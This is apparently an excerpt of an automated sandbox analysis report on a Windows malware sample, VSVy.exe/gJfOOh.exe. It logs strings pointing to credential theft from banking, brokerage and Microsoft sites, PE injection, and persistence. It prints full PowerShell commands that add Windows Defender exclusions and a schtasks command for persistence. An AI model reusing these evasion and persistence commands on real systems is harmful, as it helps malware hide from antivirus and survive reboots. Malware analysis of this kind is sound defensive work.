Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: VSVy.exe, 0000000A.00000002.3900170183.0000000000F66000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x

Source: C:\Users\user\Desktop\VSVy.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\VSVy.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\VSVy.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\VSVy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VSVy.exe"
Source: C:\Users\user\Desktop\VSVy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gJfOOh.exe"
Source: C:\Users\user\Desktop\VSVy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VSVy.exe"	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gJfOOh.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\VSVy.exe	Memory written: C:\Users\user\Desktop\VSVy.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Memory written: C:\Users\user\AppData\Roaming\gJfOOh.exe base: 400000 value starts with: 4D5A			Jump to behavior

Source: C:\Users\user\Desktop\VSVy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VSVy.exe"	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gJfOOh.exe"	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJfOOh" /XML "C:\Users\user\AppData\Local\Temp\tmp337E.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process created: C:\Users\user\Desktop\VSVy.exe "C:\Users\user\Desktop\VSVy.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJfOOh" /XML "C:\Users\user\AppData\Local\Temp\tmp7F3D.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process created: C:\Users\user\AppData\Roaming\gJfOOh.exe "C:\Users\user\AppData\Roaming\gJfOOh.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process created: C:\Users\user\AppData\Roaming\gJfOOh.exe "C:\Users\user\AppData\Roaming\gJfOOh.exe"	Jump to behavior

Source: C:\Users\user\Desktop\VSVy.exe	Queries volume information: C:\Users\user\Desktop\VSVy.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Queries volume information: C:\Users\user\Desktop\VSVy.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Queries volume information: C:\Users\user\AppData\Roaming\gJfOOh.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Queries volume information: C:\Users\user\AppData\Roaming\gJfOOh.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
